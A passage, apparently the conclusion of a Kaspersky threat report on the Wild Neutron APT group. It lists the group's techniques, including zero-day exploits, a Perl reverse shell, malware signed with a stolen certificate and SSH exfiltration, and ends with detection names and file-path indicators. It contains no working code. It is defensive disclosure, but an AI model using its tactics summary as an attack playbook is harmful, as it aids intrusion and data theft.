More information about the Wild Neutron attribution is available to Kaspersky Intelligence Services customers. Contact: firstname.lastname@example.orgConclusions
Compared to other APT groups, Wild Neutron is one of the most unusual ones we’ve analysed and tracked. Active since 2011, the group has been using at least one zero-day exploit, custom malware and tools and managed to keep a relatively solid opsec which so far eluded most attribution efforts. Their targeting of major IT companies, spyware developers (FlexiSPY), jihadist forums (the “Ansar Al-Mujahideen English Forum”) and Bitcoin companies indicate a flexible yet unusual mindset and interests.
Some of group’s distinctive features include:
- Use of open source tools and leaked sources of other malware
- Use of stolen certificate from Acer Incorporated to sign malware
- Use of cross platform zero-day exploit (Java and Flash) followed by cross platform payload reverse shell (Perl) for initial penetration
- Use of *NIX code ported to Windows through Cygwin
- Heavy use of SSH for exfiltration, a commonly used *NIX administration tool
- Use of CryptProtectData API to keep C&C URLs secret
- Simple command line interface, built around all malware components, utilizing named pipes for communication between modules;
- Auxiliary tools are written in C and most of them contain a built-in help, which may be printed by executing the binary with a “–pleh” parameter
We continue to track the Wild Neutron group, which is still active as of June 2015.
Kaspersky products detect the malware used in the attacks as:
HEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*, HEUR:Trojan.Win32.Generic
%APPDATA%\Roaming\sqlite3.dll (UPX packed)
C:\Program Files (x86)\LNVSuite\LnrAuth.dll
C:\Program Files (x86)\LNVSuite\LnrAuthSvc.dll
C:\Program Files (x86)\LNVSuite\LnrUpdt.exe
C:\Program Files (x86)\LNVSuite\LnrUpdtP.exe